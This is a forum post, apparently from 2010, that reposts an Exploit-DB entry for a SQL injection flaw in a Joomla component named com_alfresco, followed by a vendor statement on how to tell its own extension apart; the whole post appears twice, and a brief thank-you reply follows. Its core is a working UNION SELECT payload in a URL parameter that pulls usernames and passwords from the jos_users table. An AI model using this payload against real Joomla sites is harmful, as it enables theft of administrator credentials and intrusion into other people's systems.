Joomla Component com_alfresco SQL Injection Vulnerability
Options
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
01-19-2010 05:56 AM
http://www.exploit-db.com/exploits/10952
# Title: Joomla Component com_alfresco SQL Injection Vulnerability
# EDB-ID: 10952
# CVE-ID: ()
# OSVDB-ID: ()
# Author: FL0RiX
# Published: 2010-01-03
# Verified: no
# Download Exploit Code
# Download N/A
#############################################################
# Joomla Component com_alfresco SQL Injection Vulnerability
#############################################################
# Author : FL0RiX
# Name : com_alfresco
# Greez : PyskE,Dr.Kacak And All Friends
# Bug Type : SQL Injection
# Infection : Admin login bilgileri alinabilir.
# Demo Vuln. :
http://server/index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.]
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
#############################################################
< – bug code start – >
path/index.php?option=com_alfresco&task=edit&id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users–
< – bug code end of – >
How to rectify an error?
Update:
http://blog.joomlatools.eu/2010/01/security-in-third-party-addons.html
"We have investigated this report, and it does not concern the Joomla:Alfresco integration that was published through Joomlatools Labs over a year ago. We have been unable to find the developer of this extension, so we believe it might be a custom extension that is not available on the JED. If you have more information, please let us know.
If you have an Alfresco extension installed, you can identify it by opening /administrator/components/com_alfresco/manifest.xml. If it starts with the following header, you are using our secure extension. If it doesn't, you might be using the vulnerable extension.
<name>Alfresco</name>
<author>Joomlatools</author>
<copyright>Copyright (C) 2008 Joomlatools. All rights reserved.</copyright>
<creationdate>December 2008</creationdate>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<authoremail>info@joomlatools.org</authoremail>
<authorurl>www.joomlatools.org</authorurl>
<version>1.0.0</version>
<description>This component displays an Alfresco repository using CMIS</description>
"
# Title: Joomla Component com_alfresco SQL Injection Vulnerability
# EDB-ID: 10952
# CVE-ID: ()
# OSVDB-ID: ()
# Author: FL0RiX
# Published: 2010-01-03
# Verified: no
# Download Exploit Code
# Download N/A
#############################################################
# Joomla Component com_alfresco SQL Injection Vulnerability
#############################################################
# Author : FL0RiX
# Name : com_alfresco
# Greez : PyskE,Dr.Kacak And All Friends
# Bug Type : SQL Injection
# Infection : Admin login bilgileri alinabilir.
# Demo Vuln. :
http://server/index.php?option=com_alfresco&task=edit&id_pan=[SQL INJ.]
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
#############################################################
< – bug code start – >
path/index.php?option=com_alfresco&task=edit&id_pan=null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users–
< – bug code end of – >
How to rectify an error?
Update:
http://blog.joomlatools.eu/2010/01/security-in-third-party-addons.html
"We have investigated this report, and it does not concern the Joomla:Alfresco integration that was published through Joomlatools Labs over a year ago. We have been unable to find the developer of this extension, so we believe it might be a custom extension that is not available on the JED. If you have more information, please let us know.
If you have an Alfresco extension installed, you can identify it by opening /administrator/components/com_alfresco/manifest.xml. If it starts with the following header, you are using our secure extension. If it doesn't, you might be using the vulnerable extension.
<name>Alfresco</name>
<author>Joomlatools</author>
<copyright>Copyright (C) 2008 Joomlatools. All rights reserved.</copyright>
<creationdate>December 2008</creationdate>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<authoremail>info@joomlatools.org</authoremail>
<authorurl>www.joomlatools.org</authorurl>
<version>1.0.0</version>
<description>This component displays an Alfresco repository using CMIS</description>
"
Labels:
- Labels:
-
Archive
1 REPLY 1

Options
- Mark as New
- Bookmark
- Subscribe
- Mute
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
02-26-2010 05:34 AM
Thanks for this nice post. this is so useful for me.
